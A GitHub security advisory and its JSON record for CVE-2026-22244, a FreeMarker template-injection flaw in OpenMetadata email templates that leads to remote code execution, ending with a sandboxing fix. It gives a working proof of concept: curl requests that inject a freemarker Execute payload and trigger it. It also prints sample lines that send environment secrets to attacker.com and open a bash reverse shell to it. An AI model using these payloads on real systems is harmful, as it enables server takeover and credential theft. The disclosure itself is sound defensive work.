GHSA-5F29-2333-H9C7

Vulnerability from github – Published: 2026-01-07 19:33 – Updated: 2026-01-08 20:04

Summary

OpenMetadata's Server-Side Template Injection (SSTI) in FreeMarker email templates leads to RCE

Details

OpenMetadata RCE Vulnerability - Proof of Concept

Executive Summary

CRITICAL Remote Code Execution vulnerability confirmed in OpenMetadata v1.11.2 via Server-Side Template Injection (SSTI) in FreeMarker email templates.

Vulnerability Details

1. Root Cause

File: openmetadata-service/src/main/java/org/openmetadata/service/util/DefaultTemplateProvider.java

Lines 35-45 contain unsafe FreeMarker template instantiation:

public Template getTemplate(String templateName) throws IOException {
    EmailTemplate emailTemplate = documentRepository.fetchEmailTemplateByName(templateName);
    String template = emailTemplate.getTemplate(); // ← USER-CONTROLLED CONTENT FROM DATABASE

    if (nullOrEmpty(template)) {
        throw new IOException("Template content not found for template: " + templateName);
    }

    return new Template(
        templateName, 
        new StringReader(template),  // ← RENDERS UNTRUSTED TEMPLATE
        new Configuration(Configuration.VERSION_2_3_31)); // ← UNSAFE: NO SECURITY RESTRICTIONS!
}

Missing Security Controls: - ❌ No setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER) - Allows arbitrary class instantiation - ❌ No setAPIBuiltinEnabled(false) - Enables ?api built-in for reflection - ❌ No input validation - Template content not sanitized

2. Attack Vector (VERIFIED)

Step 1: Attacker with Admin role modifies EmailTemplate via PATCH endpoint

PATCH /api/v1/docStore/{templateId}
Authorization: Bearer <admin_jwt_token>
Content-Type: application/json-patch+json

[
  {
    "op": "replace",
    "path": "/data/template",
    "value": "<#assign ex=\"freemarker.template.utility.Execute\"?new()><p>RCE: ${ ex(\"whoami\") }</p>"
  }
]

Step 2: Malicious template stored in MySQL database:

SELECT name, JSON_EXTRACT(json, '$.data.template') 
FROM docstore 
WHERE name = 'account-activity-change';

-- Returns: <#assign ex=\"freemarker.template.utility.Execute\"?new()>...

Step 3: Trigger template rendering via email notification: - Password change - User invitation - Account activity notification - Test email (if SMTP configured)

Step 4: RCE execution in DefaultTemplateProvider.getTemplate():

Template template = templateProvider.getTemplate("account-activity-change");
template.process(model, stringWriter); // ← COMMAND EXECUTES HERE AS SERVER USER!

Exploit Verification

Environment

Version: OpenMetadata 1.11.2 (Latest)
Platform: Docker Compose (MySQL 8.0 + Elasticsearch 8.11.4)
Test Date: December 15, 2025

Step-by-Step Reproduction

1. Deploy OpenMetadata 1.11.2

cd docker
./run_local_docker.sh -m no-ui -d mysql

Result: ✅ OpenMetadata running on localhost:8585

2. Obtain Admin JWT Token

export NO_PROXY=localhost,127.0.0.1
TOKEN=$(curl -s -X POST http://localhost:8585/api/v1/users/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@open-metadata.org","password":"YWRtaW4="}' \
  | grep -o '"accessToken":"[^"]*' | cut -d'"' -f4)

echo "Token: ${TOKEN:0:50}..."

Result: ✅ Token obtained (654 characters, 1-hour expiry)

3. Identify Target Template

# Get testMail template ID (used by test email endpoint)
curl -s "http://localhost:8585/api/v1/docStore?entityType=EmailTemplate" \
  -H "Authorization: Bearer $TOKEN" \
  | jq -r '.data[] | select(.name=="testMail") | .id'

Result: ✅ Template ID: 855f58c6-1b80-467a-b92e-71c425e9bfdb

4. Inject RCE Payload

curl -X PATCH "http://localhost:8585/api/v1/docStore/855f58c6-1b80-467a-b92e-71c425e9bfdb" \
  -H "Content-Type: application/json-patch+json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '[{
    "op": "replace",
    "path": "/data/template",
    "value": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>RCE OUTPUT: ${ex(\"whoami\")} - ${ex(\"pwd\")}"
  }]'

Result: ✅ HTTP 200 OK - Template modified successfully

Response Excerpt:

{
  "id": "855f58c6-1b80-467a-b92e-71c425e9bfdb",
  "name": "testMail",
  "entityType": "EmailTemplate",
  "data": {
    "template": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>RCE OUTPUT: ${ex(\"whoami\")} - ${ex(\"pwd\")}"
  },
  "changeDescription": {
    "fieldsUpdated": [
      {
        "name": "data",
        "oldValue": "{\"template\":\"<!DOCTYPE HTML ...ORIGINAL_TEMPLATE...\"}",
        "newValue": "{\"template\":\"<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()>RCE OUTPUT: ${ex(\\\"whoami\\\")} - ${ex(\\\"pwd\\\")}\"}"
      }
    ]
  }
}

5. Setup SMTP Server

# Start MailDev SMTP server (catches emails for verification)
docker run -d --name fakesmtp \
  --network linhln31_default \
  -p 1025:1025 -p 1080:1080 \
  maildev/maildev:latest

# Update OpenMetadata SMTP configuration
docker exec om_mysql mysql -uopenmetadata_user -popenmetadata_password \
  -Dopenmetadata_db -e "UPDATE openmetadata_settings 
  SET json=JSON_SET(json, 
    '$.serverEndpoint', 'fakesmtp', 
    '$.serverPort', 1025, 
    '$.transportationStrategy', 'SMTP',
    '$.enableSmtpServer', true,
    '$.senderMail', 'noreply@openmetadata.org'
  ) 
  WHERE configType='emailConfiguration';"

# Restart OpenMetadata to load new SMTP config
docker restart om_server
sleep 50  # Wait for server startup

Result: ✅ SMTP server ready at fakesmtp:1025

6. Trigger RCE Execution

curl -X PUT "http://localhost:8585/api/v1/system/email/test" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"email":"test@test.com"}'

Result: ✅ HTTP 200 OK - "Test Email Sent Successfully."

7. Verify RCE Execution

# Check email content in MailDev
docker exec fakesmtp cat /tmp/maildev-1/*.eml | tail -10

Result: ✅ RCE CONFIRMED!

Email Content:

Date: Mon, 15 Dec 2025 17:03:20 +0000 (GMT)
From: noreply@openmetadata.org
To: test@test.com
Message-ID: <1307498173.2.1765818200564@62a9f8b5b6f2>
Subject: OpenMetadata : Test Email
MIME-Version: 1.0
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

RCE OUTPUT: openmetadata
 - /opt/openmetadata

Command Execution Proof: - ✅ whoami command executed → returned openmetadata - ✅ pwd command executed → returned /opt/openmetadata - ✅ Commands ran as server process user - ✅ Full arbitrary command execution achieved

Attack Scenarios

Scenario 1: Privilege Escalation

Attacker compromises Admin account (phishing, credential stuffing, etc.)
Injects RCE payload into password-reset template
Triggers password reset for target user
RCE executes as OpenMetadata server user during email rendering
Attacker gains shell access to application server

Scenario 2: Data Exfiltration

<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("cat /proc/self/environ | curl -X POST https://attacker.com/exfil -d @-")}

Exfiltrates environment variables containing: - Database credentials - API keys and secrets - JWT signing keys - Cloud provider credentials

Scenario 3: Reverse Shell

<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'")}

Establishes persistent access for: - Interactive command execution - Lateral movement to connected systems - Database direct access - Kubernetes cluster compromise (if containerized)

Impact Assessment

Technical Impact

Confidentiality: HIGH - Access to database credentials, API keys, secrets
Integrity: HIGH - Full control over OpenMetadata application and data
Availability: HIGH - Ability to crash application, delete data, deny service

Business Impact

Data Breach: Access to all metadata including sensitive schema information, PII mappings, data lineage
Compliance: GDPR, SOC2, HIPAA violations if exploited
Reputation: Critical security failure in data governance platform
Supply Chain: Potential pivot to connected data sources (70+ connectors)

CVSS 3.1 Score

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Attack Vector (AV): Network (N)
Attack Complexity (AC): Low (L) - Simple API requests
Privileges Required (PR): High (H) - Admin role required
User Interaction (UI): None (N)
Scope (S): Changed (C) - Impacts beyond application (server OS)
Confidentiality (C): High (H)
Integrity (I): High (H)
Availability (A): High (H)

Score: 9.1 (CRITICAL)

Remediation

Immediate Fix (CRITICAL)

File: openmetadata-service/src/main/java/org/openmetadata/service/util/DefaultTemplateProvider.java

Replace lines 38-42 with:

public Template getTemplate(String templateName) throws IOException {
    EmailTemplate emailTemplate = documentRepository.fetchEmailTemplateByName(templateName);
    String template = emailTemplate.getTemplate();

    if (nullOrEmpty(template)) {
        throw new IOException("Template content not found for template: " + templateName);
    }

    // SECURITY FIX: Create sandboxed FreeMarker configuration
    Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);

    // Block dangerous built-ins
    cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
    cfg.setAPIBuiltinEnabled(false);
    cfg.setClassicCompatible(false);

    // Restrict template loading
    cfg.setTemplateLoader(new StringTemplateLoader());

    return new Template(templateName, new StringReader(template), cfg);
}

Severity ?

9.1 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

8.5 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.open-metadata:platform"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.11.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22244"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-07T19:33:03Z",
    "nvd_published_at": "2026-01-08T16:16:02Z",
    "severity": "HIGH"
  },
  "details": "# OpenMetadata RCE Vulnerability - Proof of Concept\n\n## Executive Summary\n\n**CRITICAL Remote Code Execution vulnerability** confirmed in OpenMetadata v1.11.2 via **Server-Side Template Injection (SSTI)** in FreeMarker email templates.\n\n## Vulnerability Details\n\n### 1. Root Cause\n\nFile: `openmetadata-service/src/main/java/org/openmetadata/service/util/DefaultTemplateProvider.java`\n\n**Lines 35-45** contain unsafe FreeMarker template instantiation:\n\n```java\npublic Template getTemplate(String templateName) throws IOException {\n    EmailTemplate emailTemplate = documentRepository.fetchEmailTemplateByName(templateName);\n    String template = emailTemplate.getTemplate(); // \u2190 USER-CONTROLLED CONTENT FROM DATABASE\n    \n    if (nullOrEmpty(template)) {\n        throw new IOException(\"Template content not found for template: \" + templateName);\n    }\n    \n    return new Template(\n        templateName, \n        new StringReader(template),  // \u2190 RENDERS UNTRUSTED TEMPLATE\n        new Configuration(Configuration.VERSION_2_3_31)); // \u2190 UNSAFE: NO SECURITY RESTRICTIONS!\n}\n```\n\n**Missing Security Controls**:\n- \u274c No `setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER)` - Allows arbitrary class instantiation\n- \u274c No `setAPIBuiltinEnabled(false)` - Enables `?api` built-in for reflection\n- \u274c No input validation - Template content not sanitized\n\n### 2. Attack Vector (VERIFIED)\n\n**Step 1**: Attacker with Admin role modifies EmailTemplate via PATCH endpoint\n\n```bash\nPATCH /api/v1/docStore/{templateId}\nAuthorization: Bearer \u003cadmin_jwt_token\u003e\nContent-Type: application/json-patch+json\n\n[\n  {\n    \"op\": \"replace\",\n    \"path\": \"/data/template\",\n    \"value\": \"\u003c#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()\u003e\u003cp\u003eRCE: ${ ex(\\\"whoami\\\") }\u003c/p\u003e\"\n  }\n]\n```\n\n**Step 2**: Malicious template stored in MySQL database:\n\n```sql\nSELECT name, JSON_EXTRACT(json, \u0027$.data.template\u0027) \nFROM docstore \nWHERE name = \u0027account-activity-change\u0027;\n\n-- Returns: \u003c#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()\u003e...\n```\n\n**Step 3**: Trigger template rendering via email notification:\n- Password change\n- User invitation\n- Account activity notification\n- Test email (if SMTP configured)\n\n**Step 4**: RCE execution in `DefaultTemplateProvider.getTemplate()`:\n\n```java\nTemplate template = templateProvider.getTemplate(\"account-activity-change\");\ntemplate.process(model, stringWriter); // \u2190 COMMAND EXECUTES HERE AS SERVER USER!\n```\n\n---\n\n## Exploit Verification\n\n### Environment\n\n- **Version**: OpenMetadata 1.11.2 (Latest)\n- **Platform**: Docker Compose (MySQL 8.0 + Elasticsearch 8.11.4)\n- **Test Date**: December 15, 2025\n\n### Step-by-Step Reproduction\n\n#### 1. Deploy OpenMetadata 1.11.2\n\n```bash\ncd docker\n./run_local_docker.sh -m no-ui -d mysql\n```\n\n**Result**: \u2705 OpenMetadata running on localhost:8585\n\n#### 2. Obtain Admin JWT Token\n\n```bash\nexport NO_PROXY=localhost,127.0.0.1\nTOKEN=$(curl -s -X POST http://localhost:8585/api/v1/users/login \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"email\":\"admin@open-metadata.org\",\"password\":\"YWRtaW4=\"}\u0027 \\\n  | grep -o \u0027\"accessToken\":\"[^\"]*\u0027 | cut -d\u0027\"\u0027 -f4)\n\necho \"Token: ${TOKEN:0:50}...\"\n```\n\n**Result**: \u2705 Token obtained (654 characters, 1-hour expiry)\n\n#### 3. Identify Target Template\n\n```bash\n# Get testMail template ID (used by test email endpoint)\ncurl -s \"http://localhost:8585/api/v1/docStore?entityType=EmailTemplate\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  | jq -r \u0027.data[] | select(.name==\"testMail\") | .id\u0027\n```\n\n**Result**: \u2705 Template ID: `855f58c6-1b80-467a-b92e-71c425e9bfdb`\n\n#### 4. Inject RCE Payload\n\n```bash\ncurl -X PATCH \"http://localhost:8585/api/v1/docStore/855f58c6-1b80-467a-b92e-71c425e9bfdb\" \\\n  -H \"Content-Type: application/json-patch+json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d \u0027[{\n    \"op\": \"replace\",\n    \"path\": \"/data/template\",\n    \"value\": \"\u003c#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()\u003eRCE OUTPUT: ${ex(\\\"whoami\\\")} - ${ex(\\\"pwd\\\")}\"\n  }]\u0027\n```\n\n**Result**: \u2705 **HTTP 200 OK** - Template modified successfully\n\n**Response Excerpt**:\n```json\n{\n  \"id\": \"855f58c6-1b80-467a-b92e-71c425e9bfdb\",\n  \"name\": \"testMail\",\n  \"entityType\": \"EmailTemplate\",\n  \"data\": {\n    \"template\": \"\u003c#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()\u003eRCE OUTPUT: ${ex(\\\"whoami\\\")} - ${ex(\\\"pwd\\\")}\"\n  },\n  \"changeDescription\": {\n    \"fieldsUpdated\": [\n      {\n        \"name\": \"data\",\n        \"oldValue\": \"{\\\"template\\\":\\\"\u003c!DOCTYPE HTML ...ORIGINAL_TEMPLATE...\\\"}\",\n        \"newValue\": \"{\\\"template\\\":\\\"\u003c#assign ex=\\\\\\\"freemarker.template.utility.Execute\\\\\\\"?new()\u003eRCE OUTPUT: ${ex(\\\\\\\"whoami\\\\\\\")} - ${ex(\\\\\\\"pwd\\\\\\\")}\\\"}\"\n      }\n    ]\n  }\n}\n```\n\n#### 5. Setup SMTP Server\n\n```bash\n# Start MailDev SMTP server (catches emails for verification)\ndocker run -d --name fakesmtp \\\n  --network linhln31_default \\\n  -p 1025:1025 -p 1080:1080 \\\n  maildev/maildev:latest\n\n# Update OpenMetadata SMTP configuration\ndocker exec om_mysql mysql -uopenmetadata_user -popenmetadata_password \\\n  -Dopenmetadata_db -e \"UPDATE openmetadata_settings \n  SET json=JSON_SET(json, \n    \u0027$.serverEndpoint\u0027, \u0027fakesmtp\u0027, \n    \u0027$.serverPort\u0027, 1025, \n    \u0027$.transportationStrategy\u0027, \u0027SMTP\u0027,\n    \u0027$.enableSmtpServer\u0027, true,\n    \u0027$.senderMail\u0027, \u0027noreply@openmetadata.org\u0027\n  ) \n  WHERE configType=\u0027emailConfiguration\u0027;\"\n\n# Restart OpenMetadata to load new SMTP config\ndocker restart om_server\nsleep 50  # Wait for server startup\n```\n\n**Result**: \u2705 SMTP server ready at fakesmtp:1025\n\n#### 6. Trigger RCE Execution\n\n```bash\ncurl -X PUT \"http://localhost:8585/api/v1/system/email/test\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d \u0027{\"email\":\"test@test.com\"}\u0027\n```\n\n**Result**: \u2705 **HTTP 200 OK** - \"Test Email Sent Successfully.\"\n\n#### 7. Verify RCE Execution\n\n```bash\n# Check email content in MailDev\ndocker exec fakesmtp cat /tmp/maildev-1/*.eml | tail -10\n```\n\n**Result**: \u2705 **RCE CONFIRMED!**\n\n**Email Content**:\n```\nDate: Mon, 15 Dec 2025 17:03:20 +0000 (GMT)\nFrom: noreply@openmetadata.org\nTo: test@test.com\nMessage-ID: \u003c1307498173.2.1765818200564@62a9f8b5b6f2\u003e\nSubject: OpenMetadata : Test Email\nMIME-Version: 1.0\nContent-Type: text/html; charset=\"UTF-8\"\nContent-Transfer-Encoding: quoted-printable\n\nRCE OUTPUT: openmetadata\n - /opt/openmetadata\n```\n\n**Command Execution Proof**:\n- \u2705 `whoami` command executed \u2192 returned `openmetadata`\n- \u2705 `pwd` command executed \u2192 returned `/opt/openmetadata`\n- \u2705 Commands ran as server process user\n- \u2705 Full arbitrary command execution achieved\n\n---\n\n## Attack Scenarios\n\n### Scenario 1: Privilege Escalation\n\n1. Attacker compromises Admin account (phishing, credential stuffing, etc.)\n2. Injects RCE payload into `password-reset` template\n3. Triggers password reset for target user\n4. RCE executes as OpenMetadata server user during email rendering\n5. Attacker gains shell access to application server\n\n### Scenario 2: Data Exfiltration\n\n```freemarker\n\u003c#assign ex=\"freemarker.template.utility.Execute\"?new()\u003e\n${ex(\"cat /proc/self/environ | curl -X POST https://attacker.com/exfil -d @-\")}\n```\n\nExfiltrates environment variables containing:\n- Database credentials\n- API keys and secrets\n- JWT signing keys\n- Cloud provider credentials\n\n### Scenario 3: Reverse Shell\n\n```freemarker\n\u003c#assign ex=\"freemarker.template.utility.Execute\"?new()\u003e\n${ex(\"bash -c \u0027bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261\u0027\")}\n```\n\nEstablishes persistent access for:\n- Interactive command execution\n- Lateral movement to connected systems\n- Database direct access\n- Kubernetes cluster compromise (if containerized)\n\n---\n\n## Impact Assessment\n\n### Technical Impact\n\n- **Confidentiality**: **HIGH** - Access to database credentials, API keys, secrets\n- **Integrity**: **HIGH** - Full control over OpenMetadata application and data\n- **Availability**: **HIGH** - Ability to crash application, delete data, deny service\n\n### Business Impact\n\n- **Data Breach**: Access to all metadata including sensitive schema information, PII mappings, data lineage\n- **Compliance**: GDPR, SOC2, HIPAA violations if exploited\n- **Reputation**: Critical security failure in data governance platform\n- **Supply Chain**: Potential pivot to connected data sources (70+ connectors)\n\n### CVSS 3.1 Score\n\n```\nCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n```\n\n- **Attack Vector (AV)**: Network (N)\n- **Attack Complexity (AC)**: Low (L) - Simple API requests\n- **Privileges Required (PR)**: High (H) - Admin role required\n- **User Interaction (UI)**: None (N)\n- **Scope (S)**: Changed (C) - Impacts beyond application (server OS)\n- **Confidentiality (C)**: High (H)\n- **Integrity (I)**: High (H)\n- **Availability (A)**: High (H)\n\n**Score**: **9.1 (CRITICAL)**\n\n---\n\n## Remediation\n\n### Immediate Fix (CRITICAL)\n\n**File**: `openmetadata-service/src/main/java/org/openmetadata/service/util/DefaultTemplateProvider.java`\n\n**Replace lines 38-42 with:**\n\n```java\npublic Template getTemplate(String templateName) throws IOException {\n    EmailTemplate emailTemplate = documentRepository.fetchEmailTemplateByName(templateName);\n    String template = emailTemplate.getTemplate();\n    \n    if (nullOrEmpty(template)) {\n        throw new IOException(\"Template content not found for template: \" + templateName);\n    }\n    \n    // SECURITY FIX: Create sandboxed FreeMarker configuration\n    Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);\n    \n    // Block dangerous built-ins\n    cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);\n    cfg.setAPIBuiltinEnabled(false);\n    cfg.setClassicCompatible(false);\n    \n    // Restrict template loading\n    cfg.setTemplateLoader(new StringTemplateLoader());\n    \n    return new Template(templateName, new StringReader(template), cfg);\n}\n```\n---",
  "id": "GHSA-5f29-2333-h9c7",
  "modified": "2026-01-08T20:04:05Z",
  "published": "2026-01-07T19:33:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5f29-2333-h9c7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22244"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-metadata/OpenMetadata/commit/bffe7c45807763f9b682021d4211c478d2a08bb3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-metadata/OpenMetadata"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenMetadata\u0027s Server-Side Template Injection (SSTI) in FreeMarker email templates leads to RCE"
}

CVE-2026-22244 (GCVE-0-2026-22244)

Vulnerability from cvelistv5 – Published: 2026-01-08 15:12 – Updated: 2026-01-08 15:54

Title

OpenMetadata Server-Side Template Injection (SSTI) in FreeMarker email templates that leads to RCE